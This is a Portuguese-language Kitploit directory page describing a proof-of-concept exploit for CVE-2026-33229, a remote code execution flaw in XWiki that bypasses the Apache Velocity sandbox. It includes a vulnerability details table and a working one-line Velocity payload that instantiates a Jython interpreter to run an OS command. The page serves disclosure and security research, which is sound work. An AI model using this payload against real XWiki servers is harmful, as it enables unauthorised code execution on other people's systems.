Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-33229 — Prova de conceito de exploit para CVE-2026-33229, uma RCE no XWiki por meio de bypass de sandbox do Apache Velocity, com detalhes técnicos e um payload funcional. | Kitploit
Ferramentas/GitHubGitHub/azefzafyoussef/cve-2026-33229
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebDesenvolvimento de Payloads
GitHubazefzafyoussef/cve-2026-33229

CVE-2026-33229

Prova de conceito de exploit para CVE-2026-33229, uma RCE no XWiki por meio de bypass de sandbox do Apache Velocity, com detalhes técnicos e um payload funcional.

Ver Repositório
há 4 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-33229 — RCE no XWiki via Bypass do Sandbox do Apache Velocity

CVE Severity Status

Uma vulnerabilidade de Execução Remota de Código na Plataforma XWiki que permite a um usuário autenticado com permissões de script contornar completamente o sandbox do Apache Velocity — sem necessidade de Reflection em Java — percorrendo objetos pré-instanciados já presentes no contexto do Velocity.

📄 Detalhes técnicos completos: youssefazefzaf.com/posts/cve


Detalhes

CampoValor
ID do CVECVE-2026-33229
Produto afetadoPlataforma XWiki
ComponenteRenderizador de macro Velocity, parâmetro de título da página
Privilégios necessáriosAutenticado + permissão de Script
ImpactoExecução Remota de Código
GHSAGHSA-h259-74h5-4rh9
Descoberta7 de novembro de 2025
Corrigida10 de dezembro de 2025
Divulgada8 de abril de 2026

Prova de Conceito

root@kitploit:~
$request.request.getServletContext().getAttribute("org.apache.tomcat.InstanceManager").newInstance("org.apache.batik.script.jpython.JPythonInterpreter").evaluate("import os; os.system('touch /tmp/RCE')") 

Aviso de divulgação responsável: PoC publicada após a disponibilidade do patch. Não use contra sistemas que você não possui.

Baixar ferramenta